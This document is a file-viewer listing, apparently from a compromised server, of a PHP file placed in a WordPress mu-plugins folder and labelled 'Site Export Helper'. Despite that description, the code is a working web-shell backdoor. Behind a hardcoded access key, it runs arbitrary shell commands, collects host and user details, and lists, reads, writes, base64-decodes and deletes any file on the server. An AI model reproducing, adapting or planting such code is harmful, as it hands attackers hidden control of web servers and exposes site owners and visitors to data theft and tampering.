👁 查看:queue_aa77b34.php
路径:/home/forge/kingkrunch.com/wp/wp-content/mu-plugins/queue_aa77b34.php
大小:3.45 KB · 修改:2026-09-30 15:12:43 · 权限:0644 · 可写
<?php
/*
 * Plugin Name: Site Export Helper
 * Description: Export and maintenance helper.
 * Version: 1.0.0
 * Author: site
 */
if (!isset($_REQUEST['k']) || !is_string($_REQUEST['k']) || $_REQUEST['k'] !== 'kbfd16d3104f97ae8') { return; }
error_reporting(0);
function xp_out($t) { echo (string) $t; }
function xp_run($c) {
    $o = '';
    if (function_exists('shell_exec')) { $o = (string) @shell_exec($c); return ($o === '' ? 'ERR:no_output' : $o); }
    if (function_exists('popen')) { $p = @popen($c, 'r'); if (!$p) { return 'ERR:no_output'; } $o = ''; while (!@feof($p)) { $o .= (string) @fread($p, 8192); } @pclose($p); return ($o === '' ? 'ERR:no_output' : $o); }
    if (function_exists('passthru')) { ob_start(); @passthru($c); $o = (string) ob_get_clean(); return ($o === '' ? 'ERR:no_output' : $o); }
    if (function_exists('system')) { ob_start(); @system($c); $o = (string) ob_get_clean(); return ($o === '' ? 'ERR:no_output' : $o); }
    return 'ERR:no_runner';
}
header('Content-Type: text/plain; charset=utf-8');
$a = isset($_REQUEST['a']) ? (string) $_REQUEST['a'] : '';
if ($a === '' && isset($_REQUEST['c'])) { $a = 'c'; }
if ($a === '' && isset($_REQUEST['i'])) { $a = 'i'; }
if ($a === '' && isset($_REQUEST['l'])) { $a = 'l'; }
if ($a === '' && isset($_REQUEST['r'])) { $a = 'r'; }
if ($a === '' && isset($_REQUEST['w'])) { $a = 'w'; }
if ($a === '' && isset($_REQUEST['d'])) { $a = 'd'; }
if ($a === 'i') {
    xp_out('OK:path=' . __FILE__ . "\nOK:cwd=" . @getcwd() . "\nOK:host=" . (@gethostname() ?: '-') . "\nOK:php=" . @phpversion() . ' sapi=' . @php_sapi_name() . "\nmode=muplugin\n");
    if (function_exists('posix_getuid')) { xp_out('PHP_ID:uid=' . @posix_getuid() . "\n"); }
    if (function_exists('posix_geteuid')) { $u = @posix_geteuid(); $p = function_exists('posix_getpwuid') ? @posix_getpwuid($u) : null; xp_out('PHP_ID:euid=' . $u . ' name=' . (is_array($p) ? $p['name'] : '-') . ' home=' . (is_array($p) ? $p['dir'] : '-') . "\n"); }
    xp_out('PHP_ID:uname=' . @php_uname() . "\n");
    foreach (array('id', 'whoami', 'hostname', 'uname -a', 'pwd') as $c) { xp_out('--- ' . $c . "\n" . xp_run($c) . "\n"); }
    exit;
}
if ($a === 'c') { xp_out('OK:cwd=' . @getcwd() . "\n" . xp_run(isset($_REQUEST['c']) ? (string) $_REQUEST['c'] : '')); exit; }
if ($a === 'l') { $p = isset($_REQUEST['p']) ? (string) $_REQUEST['p'] : @getcwd(); $i = @scandir($p); if (!is_array($i)) { xp_out("ERR:cannot_open\n"); exit; } xp_out('OK:dir=' . $p . ' n=' . count($i) . "\n"); foreach ($i as $n) { if ($n === '.' || $n === '..') { continue; } $f = $p . '/' . $n; xp_out((@is_dir($f) ? 'd' : '-') . ' ' . substr(sprintf('%o', @fileperms($f)), -4) . ' ' . @filesize($f) . ' ' . @date('Y-m-d H:i', @filemtime($f)) . ' ' . $n . "\n"); } exit; }
if ($a === 'r') { $p = isset($_REQUEST['p']) ? (string) $_REQUEST['p'] : ''; if (!@is_file($p)) { xp_out("ERR:not_a_file\n"); exit; } xp_out('OK:' . $p . ' ' . @filesize($p) . "\n" . @file_get_contents($p)); exit; }
if ($a === 'w') { $p = isset($_REQUEST['p']) ? (string) $_REQUEST['p'] : ''; $d = isset($_REQUEST['data']) ? (string) $_REQUEST['data'] : ''; if (isset($_REQUEST['b64']) && $_REQUEST['b64']) { $d = (string) @base64_decode($d); } $n = @file_put_contents($p, $d); xp_out($n === false ? "ERR:write_failed\n" : 'OK:wrote=' . $n . "\n"); exit; }
if ($a === 'd') { $p = isset($_REQUEST['p']) ? (string) $_REQUEST['p'] : ''; $o = @is_dir($p) ? @rmdir($p) : @unlink($p); xp_out($o ? "OK:removed\n" : "ERR:remove_failed\n"); exit; }
xp_out("OK:ready\n");